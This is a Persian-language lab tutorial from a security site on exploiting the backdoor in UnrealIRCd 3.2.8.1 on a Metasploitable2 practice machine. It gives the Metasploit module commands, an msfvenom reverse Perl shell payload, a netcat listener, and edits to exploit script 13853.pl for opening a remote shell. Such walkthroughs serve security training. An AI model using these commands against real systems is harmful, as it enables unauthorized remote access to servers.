بهره برداری از UnreaIIRCd 3.2.8.1 با استفاده از متاسپلویت و اسکریپت پرل

انتشار محتوای سایت ایران سایبر فقط با ذکر منبع رسمی مجاز است 

UnrealIRCd یک IRC daemon منبع باز است و در اصل مبتنی بر DreamForge است که برای سیستم عامل های مشابه یونیکس و ویندوز در دسترس می باشد. از زمان شروع توسعه آن که در حدود UnrealIRCd در مه ۱۹۹۹ بوده، بسیاری از ویژگی های جدید از جمله ویژگی های امنیتی پیشرفته و رفع اشکال به آن اضافه یا اصلاح شده است ، و همین امر موجب شده که به یک سرور محبوب تبدیل شود.

بهره برداری از UnreaIIRCd 3.2.8.1 با استفاده از METASPLOIT
چارچوب Metasploit را با نوشتن فرمان “msfconsole” در ترمینال خود آغاز کنید.

برای بهره برداری از سرویس Daemon IRC از اکسپلویت زیر استفاده کنید:

Command: use exploit/unix/irc/unreal_ircd_3281_backdoor

در گام بعدی با وارد کردن فرمان “show options” می توانید همه گزینه های موجود را مشاهده کنید:

irc exploit

اکنون هدف را با کمک “<set RHOST <your-target-ip” مانند تصویر زیر تنظیم کنید:

متاسپلویت

اکنون در اینجا می توانید مشاهده کنید که ۱ جلسه کامند شل باز شده است و می توانید تمام دستورات مربوط به یونیکس را در برابر دستگاه هدف اجرا کنید.

command shell

بهره برداری با استفاده از اسکریپت پرل Perl Script
همین کار را می توان با کمک perl script انجام داد اما قبل از آن باید مطمئن شوید که ابزار wget  در دستگاه هدف نصب باشد وگرنه این بهره برداری کار نخواهد کرد.

از دستور زیر استفاده کنید تا با استفاده از msfvenom که یکی از محبوبترین تولیدکننده پیلود است، بتوانید اسکریپت زبان perl را تولید کنید :

Command: msfvenom -p cmd/unix/reverse_perl LHOST=192.168.169.130 LPORT=4444 -f raw

آی پی ۱۹۲٫۱۶۸٫۱۶۹٫۱۳۰ به دستگاه مورد استفاده (Kali Linux) تعلق دارد و cmd / unix / reverse_perl از نوع payload است.

 

در اینجا می توانید مشاهده کنید که یک خروجی به زبان پرل تولید شده است و همان پیلود را نیز تست می کند ، کد perl را در ترمینال جدید اجرا کنید و با استفاده از ابزار netcat همانطور که در زیر آمده است ، پورت ۴۴۴۴ را در حالت listen قرار دهید:

Command: nc -lvp 4444

 

Exploit

در اینجا می بینید که یک اتصال معکوس در ترمینال netcat باز شده است و  می توانید تمام دستورات مربوط به یونیکس را اجرا کنید.

اکنون بیایید بیشتر به کار خود ادامه دهیم و اکسپلویت اصلی (۱۳۸۵۳٫pl) را ویرایش کنیم. برای این کار می توان به راحتی با استفاده از فرمان “locate 13853.pl” جستجو کرده و از آن در فهرست root/ استفاده کنید.

آموزش اکسپلویت کردن

در مرحله بعد ، فایل ۱۳۸۵۳٫pl را با استفاده از یک ویرایشگر باز کنید و کد زیر را با کد پیلود خود که با msfvenom تولید کردیم ، تغییر دهید.

توجه: حتما از علائم نقل قول تکی حاوی شل کد معکوس Perl با یک backslash استفاده کنید. همچنین می توانید پیلودهای دیگر (payload2 $ ، $ payload3 ، $ payload4 ، $ payload5) را حذف کنید تا از اشتباهات با پیامدهای ناخواسته جلوگیری کنید.

shell perl

اکنون که بهره برداری ما ,ویرایش شده و می دانیم چه چیزی قرار است اجرا شود، زمان آن رسیده تا با تایپ دستور زیر ، اکسپلویت خود را در دستگاه Metasploiable2 شروع کنیم:

Command: perl 13853.pl <target-ip> <port> <payload number>

لینوکس اکسپلوست

 

 

نوشته های مرتبط

مدیریت پایگاه داده

۱۵

آذر
همه موضوعات

ابزار OmniDB نسخه v2.17.0 ابزاری تحت وب برای مدیریت پایگاه داده

انتشار محتوای سایت ایران سایبر فقط با ذکر منبع رسمی مجاز است ابزار OmniDB ابزاری تحت وب است که مدیریت بانک اطلاعاتی-DataBase ( دیتابیس ) را با تمرکز بر تعامل، ساده بودن، پرقدرت و سبک انجام می دهد. برخی خصوصیات این ابزار را بررسی می کنیم: ابزار وب: با استفاده از یک مرورگر تحت وب به عنوان […]

مدیریت دستگاه های IOT

۰۵

آبان
همه موضوعات

مدیریت از راه دور دستگاه های IOT با استفاده از ابزار Upswift

انتشار محتوای سایت ایران سایبر فقط با ذکر منبع رسمی مجاز است اگر فقط از یک دستگاه IoT استفاده می کنید و درحال توسعه پروژه های خود هستید، به روزرسانی و مدیریت آن سریع و آسان است. اما اگر ۱۰ ، ۵۰ یا ۱۰۰ دستگاه داشته باشید چه می کنید؟ مدیریت همه آنها ناگهان به یک دردسر[…]